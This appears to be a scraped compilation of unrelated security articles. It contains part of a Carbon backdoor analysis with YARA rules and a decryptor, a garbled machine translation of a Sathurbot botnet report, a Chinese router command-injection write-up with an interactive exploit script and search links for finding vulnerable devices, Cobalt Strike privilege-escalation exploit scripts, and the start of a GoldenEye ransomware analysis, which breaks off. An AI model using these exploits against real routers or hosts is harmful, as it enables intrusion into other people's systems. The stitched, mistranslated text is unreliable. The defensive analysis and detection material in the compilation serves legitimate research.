The field “trans_timemax” from the section [TIME] is retrieved. It is used to set the timeout for internet requests (through InternetSetOption()). It has a value of 10 minutes by default.

A first GET request is performed on the root page of the C&C web server to check that the host is alive. If no packet capture is running on the system, a new request is done on the C&C server to check if new tasks are available. A “PHPSESSID” cookie is added to the request with the victim uuid as its value. A header “Referer” is added as well and set to the C&C server URL.

The malware is expecting to get an answer to the GET request similar to:

  • <input name=”%name%” value=”%data_in_b64%”>

If the field “value” contains something, a new task is available.

Send data to the server

If the file “C_56743.NLS” / “dsntype.gif” is not empty, it means there are data to be sent the C&C server. The file is parsed and the last line is retrieved. It contains details about the data to be sent. A data blob is built and each of the following fields is encrypted with CAST-128:

  • id | val | tmp_filesize | tmp_content | [OPTIONAL (if val == 2) tmp2_filesize | tmp2_content] | len_object_id | object_id
    • id = the type of data to send to the C&C server, it can be:
      • 10: log backup
      • 11: configuration file
      • 20: a cryptographic key
      • otherwise: an id associated to a task, it can be the result of a task or an error log in the case of task execution failure
    • val = 1 if there is only one file to send, 2 if there are two files
    • object_id = the victim uuid

If the field “dtc” from the section [CRYPTO] of the configuration file is set to 0, this whole blob is base64 encoded and sent to the C&C server through a POST request.

Otherwise, another layer of encryption is used. In this case, the data blob is signed and a random 3DES key is used to encrypt it. Because the 3DES key is randomly generated and the server needs it to decrypt the data, the key is encrypted with the server public key. The server key is retrieved from the field “publicc” of the section [CRYPTO] from the configuration file.

This new blob (encrypted_key | signature_data | encrypted data) is encoded in base64 and sent to the C&C server through a POST request.

In order to avoid detection based on the data size sent in a request, the blob can be fragmented into several packets. An option in the configuration file (“post_frag” in the section [TRANSPORT]) defines whether the blob will be fragmented or sent in only one POST request.

If this option is set to “yes”, the blob is divided into several fragments of a specific size. This size comes from another field in the configuration file: “post_frag_size”.

An additional header will be added to the request:

  • “Content-Range: bytes %u-%u/%u; id=%u\r\n”, i, i+(fragment_size-1), data_size, task_id”

If the option http11 is set, a specific header is added as well:

  • “Expect: 100-continue\r\n”

For each fragments sent, the fields “post_frag_size” and “pfslastset” from the config file (section [CW_INET_RESULTS]) are updated with the fragment size and the timestamp.

Get new tasks

New tasks are retrieved from the C&C server by parsing the html page. The malware expects to find the html tag <input> in the page with a base64 encoded blob in its “value” attribute. Once decoded, this blob contains:

  • an encrypted block of 128 bytes that contains a structure “PUBLICKEYSTRUC” followed by a cryptographic key (probably a 3DES key)
  • signature data (128 bytes) to verify the integrity of the next block
  • a block of encrypted data that contains the task

The malware uses an RSA private key (retrieved from the field “keypair” from the section [CRYPTO] of the configuration file) to decrypt the first block and then uses the freshly decrypted key to decrypt the third block. This block of data can be either:

  • a task to be executed[6]
    • the data are decrypted and stored in few temporary files, the task (a command or a PE file) and its configuration file in the “Nls” folder and the output files (file that will contains the task results and the logfile) are stored in the folder “0208” (or respectively “0409” and “1033” for Carbon v3.8x)
    • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath
    • this line is appended to beginning of the file “b9s3coff.ax” (cifrado.xml on v3.8x)
  • a task to be executed by the orchestrator[7]
    • the data are decrypted and stored in few temporary files (the task, its configuration etc) in the “Nls” and “0208” folder (or “0409” and “1033” for Carbon v3.8x)
    • depending of the content of the data, one of these lines will be added to the beginning of the file “a67ncode.ax” (encodebase.info on v3.8x)
      • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath
      • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath | execution_mode | username | password
      • task_id | task_filepath | task_config_filepath | task_result_filepath | task_log_filepath | execution_mode
  • a new RSA server public key
    • in this case, the configuration file is updated with the new key encoded in base64 (field publicc)
  • data to be sent to an instance of Carbon running in another computer in the same network
    • the data can contains a specific IP address and port, a named pipe or a named pipe with a username and password.

Check Internet availability

Each hour, the internet connection is checked. A first check is done by calling the function InternetAttemptConnect(). If it works, another test is done by sending HTTP GET requests to the following websites:

  • www.google.com
  • www.yahoo.com
  • www.bing.com
  • update.microsoft.com
  • windowsupdate.microsoft.com
  • microsoft.com

An event is used to notify the other threads in case of the loss of Internet access.

Configuration file backup

Similar to the logfile, the configuration file is also periodically backed up and sent to the C&C server. The thread executes the code in a specific range of time (between 8h and 20h by default)[8].

The value “configlastsend” is retrieved from the section [TIME] of the configuration file. If the config file has been sent over a month ago, the config file is copied into a temporary file with a random name prefixed by “~D” in the folder “208” (for Carbon v3.7x) or “1033” (for Carbon v3.8x). This file is then encrypted with CAST-128 algorithm.

To notify the thread that communicates with the C&C server that a new file is ready to be sent to the server, the following line is appending to the file “C_56743.NLS” (for Carbon v3.7x) or “dsntype.gif” (for Carbon v3.8x):

  • “11|1|%s|%s”
    • 1st field: an ID to identify the file as a config file
    • 2nd field: 1 (file to be sent to the C&C server)
    • 3rd field: the temp filepath
    • 4rd field: the victim uuid

Last but not least, the attribute “configlastsend” is updated with the current time.

Additional Notes

Calling API functions

The base address of the modules of interest are retrieved by either parsing the PEB or (if the modules are not loaded into the process memory) by loading the needed files from disk into memory and parsing their headers to get their base addresses.

Once the base addresses are retrieved, the PEB is walked again and the field “LoadCount” from the structure LDR_DATA_TABLE_ENTRY is checked. This value is used as a reference counter, to track the loading and unloading of a module.

If “LoadCount” is positive, the module EAT is parsed to get the needed function address.

Encryption

The module and function names are encrypted (at least since v3.77; it was not the case in v3.71) in a simple way, a logical shift of 1 bit being applied to each characters.

The processes’ names are encrypted as well by just XOR’ing each character with the key 0x55 (for Carbon v3.7x at least since v3.77) and with the key 0x77 for Carbon v3.8x.

With only a few the exceptions, each file from the Carbon working directory is encrypted with the CAST-128 algorithm in OFB mode. The same key and IV are used from the version 3.71 until the version 3.81:

  • key = “\x12\x34\x56\x78\x9A\xBC\xDE\xF0\xFE\xFC\xBA\x98\x76\x54\x32\x10”
  • IV = “\x12\x34\x56\x78\x9A\xBC\xDE\xF0”

Check if packet capture is running

Before communicating with the C&C server or with other computers, the malware ensures that none of the most common packet capture software is running on the system:

  • TCPdump.exe
  • windump.exe
  • ethereal.exe
  • wireshark.exe
  • ettercap.exe
  • snoop.exe
  • dsniff.exe

If any of these processes are running, no communication will be done.

Carbon IoCs are also available on ESET’s GitHub repositoryhttps://github.com/eset/malware-ioc/tree/master/turla

Appendices

Yara rules

import “pe”

rule generic_carbon
{
strings:
$s1 = “ModStart”
$s2 = “ModuleStart”
$t1 = “STOP|OK”
$t2 = “STOP|KILL”
condition:
(uint16(0) == 0x5a4d) and (1 of ($s*)) and (1 of ($t*))
}

rule carbon_metadata
{
condition:
(pe.version_info[“InternalName”] contains “SERVICE.EXE” or
pe.version_info[“InternalName”] contains “MSIMGHLP.DLL” or
pe.version_info[“InternalName”] contains “MSXIML.DLL”)
and pe.version_info[“CompanyName”] contains “Microsoft Corporation”
}

Carbon files decryptor/encryptor

carbon_tool.py

#!/usr/bin/env python2

from Crypto.Cipher import CAST
import sys
import argparse

def main():

parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(“-e”, “–encrypt”, help=”encrypt carbon file”, required=False)
parser.add_argument(“-d”, “–decrypt”, help=”decrypt carbon file”, required=False)

try:
args = parser.parse_args()
except IOError as e:
parser.error(e)
return 0

if len(sys.argv) != 3:
parser.print_help()
return 0

key = “\x12\x34\x56\x78\x9A\xBC\xDE\xF0\xFE\xFC\xBA\x98\x76\x54\x32\x10”
iv = “\x12\x34\x56\x78\x9A\xBC\xDE\xF0”

cipher = CAST.new(key, CAST.MODE_OFB, iv)

if args.encrypt:
plaintext = open(args.encrypt, “rb”).read()
while len(plaintext) % 8 != 0:
plaintext += “\x00”
data = cipher.encrypt(plaintext)
open(args.encrypt + “_encrypted”, “wb”).write(data)
else:
ciphertext = open(args.decrypt, “rb”).read()
while len(ciphertext) % 8 != 0:
ciphertext += “\x00”
data = cipher.decrypt(ciphertext)
open(args.decrypt + “_decrypted”, “wb”).write(data)

if __name__ == “__main__”:
main()

Open Source documentation

Carbon footprint

Table 2 – Carbon sample hashes
SHA1 hash
7f3a60613a3bdb5f1f8616e6ca469d3b78b1b45b
a08b8371ead1919500a4759c2f46553620d5a9d9
4636dccac5acf1d95a474747bb7bcd9b1a506cc3
cbde204e7641830017bb84b89223131b2126bc46
1ad46547e3dc264f940bf62df455b26e65b0101f
a28164de29e51f154be12d163ce5818fceb69233
7c43f5df784bf50423620d8f1c96e43d8d9a9b28
7ce746bb988cb3b7e64f08174bdb02938555ea53
20393222d4eb1ba72a6536f7e67e139aadfa47fe
1dbfcb9005abb2c83ffa6a3127257a009612798c
2f7e335e092e04f3f4734b60c5345003d10aa15d
311f399c299741e80db8bec65bbf4b56109eedaf
fbc43636e3c9378162f3b9712cb6d87bd48ddbd3
554f59c1578f4ee77dbba6a23507401359a59f23
2227fd6fc9d669a9b66c59593533750477669557
87d718f2d6e46c53490c6a22de399c13f05336f0
1b233af41106d7915f6fa6fd1448b7f070b47eb3
851e538357598ed96f0123b47694e25c2d52552b
744b43d8c0fe8b217acf0494ad992df6d5191ed9
bcf52240cc7940185ce424224d39564257610340
777e2695ae408e1578a16991373144333732c3f6
56b5627debb93790fdbcc9ecbffc3260adeafbab
678d486e21b001deb58353ca0255e3e5678f9614
Table 3 – C&C server addresses (hacked websites used as 1st level of proxies
C&C server address
soheylistore.ir:80:/modules/mod_feed/feed.php
tazohor.com:80:/wp-includes/feed-rss-comments.php
jucheafrica.com:80:/wp-includes/class-wp-edit.php
61paris.fr:80:/wp-includes/ms-set.php
doctorshand.org:80:/wp-content/about/
www.lasac.eu:80:/credit_payment/url/
Notes
5. two hours by default, but the waiting time depends of the field value “logperiod” from the “LOG” section of the configuration file
6. check “Tasks execution” part for more details
7. check “Orchestrator / Tasks execution” part for more details
8. depending of the config file, check “Log rotation” for the details

中国骇客云sathurbot:分布式WordPress密码攻击

本文揭示了当前生态系统sathurbot后门木马,特别是在其使用的种子作为输送介质及其分布式蛮弱的WordPress的管理员帐户的强迫。

torrent下载者

想不付钱就下载一部电影或软件?可能会有相关的风险。它很可能会发生,你最喜欢的搜索引擎返回到正常无关的文件共享网站Torrent链接。他们可以,但是,运行WordPress和已经被攻破。

一些搜索结果的例子:

点击那些链接返回以下页面(注意,有的甚至使用HTTPS):

这部电影的子页面都导致相同的torrent文件;而所有软件的子页面导致另一个torrent文件。当你开始在你的喜爱torrenting BT客户端,你会发现文件是好种子,从而出现合法。如果你下载电影的洪流,其内容将与视频延长伴有明显的编解码器包的安装程序文件,并解释文本文件。该软件包含了一个明显的安装程序可执行文件和洪流的一个小的文本文件。两者的目的都是让让受害者运行可执行文件加载DLL的sathurbot。

在你开始执行,你会有这样的消息:

当你思考你的选择,不好的事情开始发生在背景。你刚刚成为BOTsathurbot网络

后门和下载

在启动时,sathurbot检索与C的一个查询的DNS。该反应是一个DNS的TXT等记录。它的字符串值解密作为C &#38; C状态报告域名,任务检索到其他恶意软件下载链接。

sathurbot可以自我更新和下载和启动其他可执行文件。我们已经看到的变化boaxxeKovterfleercivet,但这不一定是一个详尽的列表。

的sathurbot然后报告其成功安装在一个监听端口的C&C的定期报告到C和C,它是活得很好,等待额外的任务。

网络爬虫

sathurbot附带一些5000再加上基本的通用词。这些都是随机组合形成2-4字词组合作为通过谷歌查询字符串,Bing搜索引擎Yandex。

从网页在每一个这样的搜索结果网址,随机2-4词长文本块选择(这次可能是更有意义的因为它是从真实文本)和用于搜索查询下一轮。

最后,搜索结果的第二集(第三页)收获的域名。

提取的域名都是随后探讨由WordPress框架创建。这里的诀窍是检查响应的URLhttp://〔〕/wp-login.php _名字域

随后该域的根目录页取了其他框架的存在。换句话说,他们也感兴趣:Drupal、Joomla,php-nuke,phpfox,和dedecms。

在启动时,或在一定的时间间隔,收获的域发送到C和C(一个不同的域是用比借壳–硬编码的一个)。

分布式的WordPress的密码攻击

客户现在可以得到一个列表域访问凭据(格式为登录名:密码@域)探讨密码。在Sathurbot的僵尸网络不同的机器人尝试不同的登录凭据相同的网站。每个机器人只尝试每网站和移动单点登录。这种设计有助于确保BOT没有IP地址被列入黑名单的任何目标网站,可以重温它的未来。

在我们的测试中,探讨10000项列表是由C和C返回

对于攻击本身的XML-RPC APIWordPress是使用。特别是wp.getusersblogsAPI的滥用。一个典型的请求看起来像:

探索一个数域凭据如下图所示的序列:

响应进行评估和结果发布到C和C

洪流客户端,播种机

BOT具有libtorrent图书馆集成和任务之一是成为一个播种机–二进制文件下载、创建和种子的种子。

BitTorrent的引导

完成周期从吸血一个非自愿的播种机

注:在网络不是每个BOT是执行所有的功能,有些只是网络爬虫,有的只是攻击XML-RPC API,有的做。而且,并不是每一个BOT似乎是播种的洪流。

影响

上述的尝试wp-login.php /从众多的用户,甚至网站不主机WordPress的,是sathurbot的直接影响。许多网站管理员观察和想知道为什么会发生。此外,WordPress网站可以看到潜在的攻击wp.getusersblogs在他们的日志

通过检查日志,系统构件和文件,僵尸网络由超过20000受感染的计算机,至少从六月2016活跃。

偶尔,我们看到Torrent链接通过电子邮件发送以及。

检测

网络管理员–检查服务器上的未知的子页面和/或目录。如果他们有任何引用洪流下载提供,检查和可能的后门攻击日志。

用户–运行Wireshark的滤波器http.request没有浏览器打开看到太多的要求,喜欢wp-login.php /和/或邮政/ xmlrpc.php。另外,检查文件或注册表项在国际奥委会部分上市,下面。

ESET用户免受这一威胁的多层次。

搬家公司

网络管理员–修改密码,删除不属于网站的子页面,随意擦拭,从备份中恢复的网站。

用户–使用第三方的文件管理器找到嫌犯。DLL(注意,文件和目录都有隐藏属性设置),打开进程管理器、任务管理器,杀死explorer.exe和/或rundll32.exe,删除(检疫)的影响。DLL,启动。

注意:这将删除sathurbot而已,并没有任何其他恶意软件可能还下载了。

另外,考虑全面的反恶意软件产品,或者至少是一个在线扫描

预防

网络管理员–应该正常运作的网站不需要XML-RPC API,建议您禁用它并使用复杂的密码。

用户–避免运行的可执行文件从其他来源比尊重开发者下载,并不是设计作为主要的文件共享网站的站点下载文件。

IOC

目前,我们已经观察到sathurbot安装:

programdata \ Microsoft \ \ \ \ performancemonitor.dll性能监视器

\下\微软\ \ \ theftprotection.dll theftprotection性能

\下\微软\ \ \ securityhelper.dll性能监控

\用户\ ***** \ AppData \地方\微软\保护\ protecthost.dll

运行中rundll32.exe或Explorer.exe进程锁和编辑文件和注册表键。它是在安装x32和x64位版本目前。

子文件夹,以上(含种子文件的洪流)
securitycache \ \ \ \缓存摘要
\ \ \ \ securitycache缓存规则
securitycache日期\ \ \
“securitycache \ zepplauncher.mif–包含DHT节点
\温度\

syshashtable %APPDATA%directory \ \–包含表示哈希文件夹访问域
syshashtable %APPDATA%directory \ \ syshashinfo.db–收集有趣的领域,包括框架的信息

样品(SHA-1)

安装程序:
2d9afb96eafbcfcdd8e1caff492bfcf0488e6b8c
3d08d416284e9c9c4ff36f474c9d46f3601652d5
512789c90d76785c061a88a0b92f5f5778e80baa
735c8a382400c985b85d27c67369ef4e7ed30135
798755794d124d00eab65653442957614400d71d
4f52a4a5ba897f055393174b3dfca1d022416b88
8edfe9667ecfe469bf88a5a5ebbb9a75334a48b9
5b45731c6bba7359770d99124183e8d80548b64f
c0f8c75110123bee7db5ca3503c3f5a50a1a055e
c8a514b0309bcde73f7e28eb72eb6cb3abe24fdd
af1ae760f055120ca658d20a21e4b14244bc047d
a1c515b965fb0ded176a0f38c811e6423d9ffd86
b9067085701b206d2ac180e82d5bc68edd584a8b
77625adea198f6756e5d7c613811a5864e9874ea
sathurbot DLL:
f3a265d4209f3e7e6013ca4524e02d19aac951d9
0ea717e23d70040011bd8bd0bf1ffaaf071da22c
2381686708174bc5de2f04704491b331ee9d630b
2b942c57cee7e2e984ee10f4173f472db6c15256
2f4faa5cb5703004ca68865d8d5dacba35402de4
4ebc55fdfb4a1dd22e7d329e6ef8c7f27e650b34
0ef3ecd8597ce799715233c8ba52d677e98abdfd
0307bbac69c54488c124235449675a0f4b0ccefa
149518fb8de56a34b1ca2d66731126cf197958c3
3809c52343a8f3a3597898c9106ba72db7f6a3cb
4a69b1b1191c9e4bc465f72d76fe45c77a5cb4b0
5ccdb41a34ada906635ce2ee1ab4615a1afcb2f2
6c03f7a9f826bb3a75c3946e3ef75bfc19e14683
8da0dc48afb8d2d1e9f485029d1800173774c837
ac7d8140a8527b8f7ee6788c128aff4ca92e82c2
e1286f8ae85eb8bd1b6be4684e3c9e4b88d300db

额外的载荷:

c439fc24cafa3c8008fc01b6f4c39f6010ce32b6
aba9578ab2588758ad34c3955c06cd2765bfdf68
dfb48b12823e23c52dae03ee4f7b9b5c9e9fdf92
faff56d95f06fe4da8ed433985fa2e91b94ee9ad
b728eb975cf7fdd484fcbcffe1d75e4f668f842f
59189abe0c6c73b66944795a2ef5a2884715772e
c6bdb2dc6a48136e208279587efa6a9dd70a3faa
beaa3159dbe46172fc79e8732c00f286b120e720
5ed0df92174b62002e6203801a58fe665ef17b76
70dfaba5f98b5ebc471896b792bbef4db4b07c53
10f92b962d76e938c154dc7cbd7defe97498ab1e
426f9542d0dda1c0ff8d2f4cb0d74a1594967636
aa2176834ba49b6a9901013645c84c64478aa931
1c274e18a8cad814e0094c63405d461e815d736a
61384c0f690036e808f5988b5f06fd2d07a87454
f32d42ef1e5ed221d478cfaa1a76bb2e9e93a0c1
594e098e9787eb8b7c13243d0edf6812f34d0fba
1aafebaa11424b65ed48c68cdeed88f34136b8dc
ba4f20d1c821b81bc324416324ba7605953d0605
e08c36b122c5e8e561a4de733ebb8f6ae3172bf0
7748115af04f9fd477041cb40b4c5048464ce43e
3065c1098b5c3fc15c783cdde38a14dfa2e005e4
fa25e212f77a06c0b7a62c6b7c86643660b24dda
fadadffa8f5351794bc5dcabe301157a4a2ebbcf
b0692a03d79cd2ea7622d3a784a1711adaabee8d
9411991dcf1b4ed9002d9381083de714866aea00

相关域

DNS:
zeusgreekmaster.xyz
apollogreekmaster.xyz

C &#38; C:
jhkabmasdjm2asdu7gjaysgddasd.xyz
boomboomboomway.xyz
mrslavelemmiwinkstwo.xyz
uromatalieslave.space
newforceddomainisherenow.club
justanotherforcedomain.xyz
artemisoslave.xyz
asxdq2saxadsdawdq2sasaddfsdfsf4ssfuckk.xyz
kjaskdhkaudhsnkq3uhaksjndkud3asds.xyz
badaboommail.xyz

BT:
badaboomsharetracker.xyz
webdatasourcetraffic.xyz
sharetorrentsonlinetracker.xyz
webtrafficsuccess.xyz

注册值

您可能需要使用第三方工具,Windows Regedit甚至可能不会显示这些

HKLM \系统\ CurrentControlSet \服务\ \ \ \ firewallrules访问共享参数firewallpolicy \ {可变的GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\explorer.exe|Name=Windows Explorer|”

HKLM \系统\ CurrentControlSet \服务\ \ \ \ firewallrules访问共享参数firewallpolicy \ {可变的GUID} = “v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\system32\\rundll32.exe|Name=Windows host process (Rundll32)|”

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0TheftProtectionDll = {guid1}
HKLM \软件\ \ \ {类的CLSIDguid1} = “Windows Theft Protection”
HKLM \软件\ \ \ {类的CLSIDguid1}\InprocServer32 = “C:\\ProgramData\\Microsoft\\Performance\\TheftProtection\\TheftProtection.dll”
HKLM \软件\ \ \ {类的CLSIDguid1}\InprocServer32\ThreadingModel = “Apartment”

HKLM \软件\ \ \类的CLSIDguid2 } {

这个guid2 } {项是变量在样本和有6个字符长的子项,内容是用来存储变量的二进制类型和加密–,临时值和设置,IP,C&#38;C,UID

例如guid2 } {条目的样子

HKLM \ \ \软件类的CLSID。{ 8e577f7e – 03c2 – 47d1 – b4c0 bce085f78f66 0000000 – 3)。
HKLM \ \ \软件类的CLSID。{ 8e577f7e – 03c2 – 47d1 – b4c0 bce085f78f66 0000000 – 2)。
HKLM \ \ \软件类的CLSID。{ 8e577f7e – 03c2 – 47d1 – b4c0 – bce085f78f66 00000001。}
HKLM \ \ \软件类的CLSID。{ 8e577f7e – 03c2 – 47d1 – b4c0 – 9 0000000 bce085f78f66 }。
HKLM \ \ \软件类的CLSID。{ 8e577f7e – 03c2 – 47d1 – b4c0 – bce085f78f66 000000 11 }。
HKLM \软件\类\ CLSID \ { 8e577f7e-03c2-47d1-b4c0-bce085f78f66 } 00010001
HKLM \软件\类\ CLSID \ { 8e577f7e-03c2-47d1-b4c0-bce085f78f66 } 00010002
HKLM \ \ \软件类的CLSID。{ 8e577f7e – 03c2 – 47d1 – b4c0 bce085f78f66 0000000 – 8)。
HKLM \ \ \软件类的CLSID。{ 8e577f7e – 03c2 – 47d1 – b4c0 bce085f78f66 0000000 – 7 }。
HKLM \ \ \软件类的CLSID。{ 8e577f7e – 03c2 – 47d1 – b4c0 bce085f78f66 0000000 – 4)。
HKLM \ \ \软件类的CLSID。{ 8e577f7e – 03c2 – 47d1 – b4c0 – bce085f78f66 000000 10 }。
HKLM \软件\类\ CLSID \ { 8e577f7e-03c2-47d1-b4c0-bce085f78f66 } 00020001

黑客与饥渴从内网弱口令到公网智能路由器

背景故事:

在对公司内网主机ssh服务弱口令扫描的时候,发现几处弱口令,成功登录之后发现是smashclp服务如下图:

001.jpg

然后对此IP,nmap扫描一下,发现有80端口,直接访问。

Not shown: 994 closed ports

PORT     STATE SERVICE

22/tcp   open  ssh

80/tcp   open  http

199/tcp  open  smux

427/tcp  open  svrloc

443/tcp  open  https

5120/tcp open  barracuda-bbs

001.jpg

在这里,比较关注的是http请求中的header信息,可以看到

Server:GoAhead-Webs

利用shodan.io去搜索这个信息,看看有没有什么新发现。

发现漏洞:

利用shodan搜索

https://www.shodan.io/search?query=GoAhead-Webs+country%3A%22CN%22

得到的结果如下

001.jpg

仔细看了下搜索结果,大失所望,发现没有IPMI的主机(可能这种系统一般不会放到外网而且还是弱口令),然后继续随意点了其他几个IP,发现有弱口令的监控设备,然后就是路由器。

那么,就继续看看这些路由器设备。路由器的IP是111.111.111.111:81,访问后跳转到http://111.111.111.111:81/home_H1.asp

界面是这样的

001.jpg

也有这样的

001.jpg

还有这样的

001.jpg

挖掘漏洞:

一般路由器的漏洞有命令执行,出在ping服务上面,另外可能的漏洞就是绕过登录限制。

这里从可以直接访问的IP中,从系统管理==>系统工具,利用ping服务,输入 t.cn|ls 等即可命令执行。如下图所示

001.jpg

这里写个脚本,方便自己命令执行,如下

#!/usr/bin/env python# coding=utf-8# author=Tonybreak'''需要安装requests和BeautifulSouppip install requestspip install beautifulsoup4命令执行的时候,由于网络问题。本身比较慢,请等待'''import requests as rqfrom bs4 import BeautifulSoup# 这里修改为目标IP和端口host = '111.111.111.111:81'def bs(html):    soup = BeautifulSoup(html,'html.parser')return soupdef cmd():    p_url = "http://%s/goform/sysTools" % host    cmds = raw_input('Plz input cmd:')    data = 'tool=0&pingCount=4&host=t.cn%7C' + cmds + '&sumbit=%E7%A1%AE%E5%AE%9A'    dd = rq.post(url=p_url,data=data).content    mm = bs(dd)    a = mm.find('textarea',{'readonly':'1'}).get_text()print aif __name__ == '__main__':while 1:try:            cmd()except:continue

执行结果如下

001.jpg

002.jpg

由于是不完整的linux系统,部分命令不可用,好在wget可用。

在上面的三个界面中,第三种是需要登录的,可以考虑猜解密码或者绕过,这里没有继续深入。

总结:

和上一篇文章一样,没有什么技术可言,主要是由点及面,稍微扩展下,找到的这些漏洞。智能路由器听上去智能,实际上可能并不智能呢,也许你家里的网络又被他劫持了呢?

建议厂商赶紧修复漏洞。

如有什么疑问,欢迎留言讨论。

样本IP就从这里找吧

https://www.shodan.io/search?query=home_H1.asp

https://www.zoomeye.org/search?q=home_H1.asp%20port%3A81%20country%3AChina&p=1&t=host

中国骇客云工具提权利器Cobalt Strike发布3.6版本

简介

Cobalt Strike 3.6版本已经正式发布,此版本新增了一个用于调用Beacon的第三方提权漏洞利用程序的API,并扩展Malleable C2以支持不使用HTTP POST的HTTP C&C。同时该版本还对之前版本中存在的问题进行了修复和改进。目前网上能找到3.5版本的破解版本,相关破解以及工具使用技巧在FB上资源还是挺多的。

CobaltStrike最新版完美破解方法

如何制作Cobalt Strike v2.5破解版

在Kali 2.0下安装破解最新版Cobalt Strike

关于分析Cobalt Strike的beacon.dll的一些TIPS

提权API

此版本新增了一个API将提权利用程序集成到Beacon的elevate命令。

下面以FuzzySec发现的ms16-032漏洞为例子,将变型的PowerShell Empire集成到Beacon中:

sub ms16_032_exploit {    local('$script $oneliner');    # acknowledge this command    btask($1, "Tasked Beacon to run " . listener_describe($2) . " via ms16-032");    # generate a PowerShell script to run our Beacon listener    $script = artifact($2, "powershell");    # host this script within this Beacon    $oneliner = beacon_host_script($1, $script);    # task Beacon to run this exploit with our one-liner that runs Beacon    bpowershell_import!($1, script_resource("modules/Invoke-MS16032.ps1"));    bpowerpick!($1, "Invoke-MS16032 -Command \" $+ $oneliner $+ \"");    # give it another 10s to work.    bpause($1, 10000);    # handle staging    bstage($1, $null, $2);}beacon_exploit_register("ms16-032", "Secondary Logon Handle Privilege Escalation (CVE-2016-099)", &ms16_032_exploit);

接下来,我们试试别的。Metasploit框架应用了许多依照反射DLL(Reflective DLLs)注入原理提权的exploit。

Metasploit提权利用攻击的流程

首先生成一个patsy进程,其次将exploit注射到patsy进程,之后将stager shellcode payload注射到patsy进程,最后运行exploit DLL时通过一个指针指向已经完成注射的shellcode。

可能你会有疑问,是否还能在Beacon中使用这些DLL?得益于Aggressor Script中的bdllspawn函数我们依旧可以在Beacon中使用这些DLL。这个函数调用一个作用于Beacon post-exploitatio的反射DLL,它可以向DLL传递一个任意参数,并且可以监控标准输出。

以下脚本为使用ms15_051_client_copy_image的Beacon payload:

sub ms15_051_exploit {    # acknowledge this command    btask($1, "Task Beacon to run " . listener_describe($2) . " via ms15-051");    # tune our parameters based on the target arch    if (-is64 $1) {        $arch   = "x64";        $dll    = "modules/cve-2015-1701.x64.dll";    }    else {        $arch   = "x86";        $dll    = "modules/cve-2015-1701.x86.dll";    }    # generate our shellcode    $stager = shellcode($2, false, $arch);    # make sure we have shellcode for this listener (some stagers are x86 only)    if ($stager is $null) {        berror($1, "No $arch stager for listener ' $+ $2 $+ '");        return;    }    # spawn a Beacon post-ex job with the exploit DLL    bdllspawn!($1, script_resource($dll), $stager, "ms15-051", 5000);    # stage our payload (if this is a bind payload)    bstage($1, $null, $2, $arch);}beacon_exploit_register("ms15-051", "Windows ClientCopyImage Win32k Exploit (CVE 2015-1701)", &ms15_051_exploit);

这些函数使得你的团队能更轻松的集成Cobalt Strike自定义功能,以及在Beacon中快速适配新的漏洞。

提权套件

如果你想了解更多提权相关的范例,可以查看Elevate Kit。此外还可以查阅Aggressor Script,该文演示了如何在Cobalt Strike的Beacon payload中使用PowerShell以及反射DLL exploit。

Elevate Kit使用方法:下载ElevateKit文件并将其提取到Cobalt Strike,进入Cobalt Strike -> Scripts,单击Load,然后选择elevate.cna

在Beacon中:键入elevate可查看当前加载的exploit列表。键入elevate [exploit name] [listener]针对当前Beacon会话实施利用。

Malleable C2

以下截图为Beacon与webbug_getonly profile的通信数据。

你可以猜到哪边是Beacon对Cobalt Strike发起的下载任务请求? 哪边是Beacon对Cobalt Strike做出的响应?

本版本通过使用Malleable C2很大程度上增强了Beacon的HTTP通信的灵活性。你现在可以为Beacon的http-get和http-post处理方式设置HTTP动词。同时还可以将Beacon的响应推送到URI、数据头或参数中。而且Beacon将其响应自动分块(并使用多个请求)以适应HTTP GET-only通道的约束。

如果你喜欢对配置文件的技巧以及分析发起挑战,我想这会带给你更多的乐趣。此外这些变化还使得“模拟”不同恶意软件的HTTP通信数据变得更精确。

点击发行说明查看Cobalt Strike 3.6中的新特性的完整列表。授权用户可使用更新程序获取更新,同时提供21天试用的Cobalt Strike trial版本也发布了。

注:由于美国出口控制要求,你得全局科学访问该使用版本下载页面。另外试用版本没有对Beacon任务以及响应加密,仅建议在实验环境下使用,切勿在生产环境下使用!授权用户则无此限制。

MBR勒索木马再度来袭hackerschina中国云木马goole

早在今年上半年,破坏力极强的修改MBR并加密MFT (Master File Table)的勒索木马Petya就引起了杀毒厂商的高度关注,然而在今年下半年360白名单分析组又捕获了该作者最新的勒索木马“GoldenEye”。 半年以来该木马作者与杀毒软件的对抗持续升级,新的勒索木马的查杀难度显著增强。 

一、 主要流程

1.jpg

图1  GoldenEye木马流程图

二、 Shellcode部分

GoldenEye为了伪装自己,在微软的开源代码ZoomIt中嵌入了恶意的ShellCode。

2.png

图2  GoldenEye中微软开源的ZoomIt相关字符串

ShellCode经过多层SMC解密出GoldenEye主体,并PE Loader执行。

3.png

图3  ShellCode解密出GoldenEye的代码

接着解密Loader的xxxx区段,里面包含Petya以及提权DLL(elevate_x86.dll/elevate_x64.dll),并动态载入API。

4.png

图4  解密Loader的xxxx区段

三、 伪装功能

如果主程序不处于%AppData%目录下,则执行伪装功能,否则执行加密功能。

5.png

图5  判断程序路径执行不同功能

通过将自己伪装成系统文件来迷惑用户。

6.png

图6  将自身复制到%appdata%\UUID\rsvp.exe中

其中rsvp.exe是由FindFirstFileA匹配以下模式来获得的任一系统文件名:

\system32\w*w.exel*x.exem*p.exel*h.exea*r.exeg*d.exef*i.exea*v.exeo*i.exey*n.exel*h.exeh*q.exep*b.exem*d.exe

7.png

图7  FindFirstFileA查找匹配的任一系统文件

UuidCreate创建随机Uuid,如图6中的{0a993d81-16ef-454e-84a0-4cf182e67159}。

8.png

图8  UuidCreate创建随机UUID

调用UpdateResourse将正常系统文件版本资源数据替换给GoldenEye,设置GoldenEye文件时间和kernel32.dll一致。

9.png

图9  GoldenEye获取正常系统文件版本资源更新到拷贝的文件

创建进程执行伪装后的GoldenEye。

10.png

图10  调用伪装后的GoldenEye

四、 选择Payload

